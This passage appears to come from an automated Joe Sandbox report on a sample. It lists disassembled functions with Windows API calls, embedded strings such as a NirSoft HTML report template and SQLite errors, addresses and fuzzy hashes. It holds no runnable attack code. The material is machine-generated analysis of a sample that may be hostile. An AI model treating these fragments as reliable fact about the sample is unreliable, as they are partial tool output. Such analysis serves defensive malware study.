                                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                                                                    • API String ID: 973020956-4135340389
                                                                                                                                                                                                                                    • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                                    • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                                    • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                                    • API String ID: 1284135714-318151290
                                                                                                                                                                                                                                    • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                                    • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 290601579-0
                                                                                                                                                                                                                                    • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                                    • String ID: PD$PD
                                                                                                                                                                                                                                    • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                                    • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2163313125-0
                                                                                                                                                                                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free$wcslen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3592753638-3916222277
                                                                                                                                                                                                                                    • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                                    • String ID: %s (%s)$YV@
                                                                                                                                                                                                                                    • API String ID: 3979103747-598926743
                                                                                                                                                                                                                                    • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                                    • API String ID: 2767993716-572158859
                                                                                                                                                                                                                                    • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                                    • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                                    • Opcode ID: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                                                                                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                                                    APIs
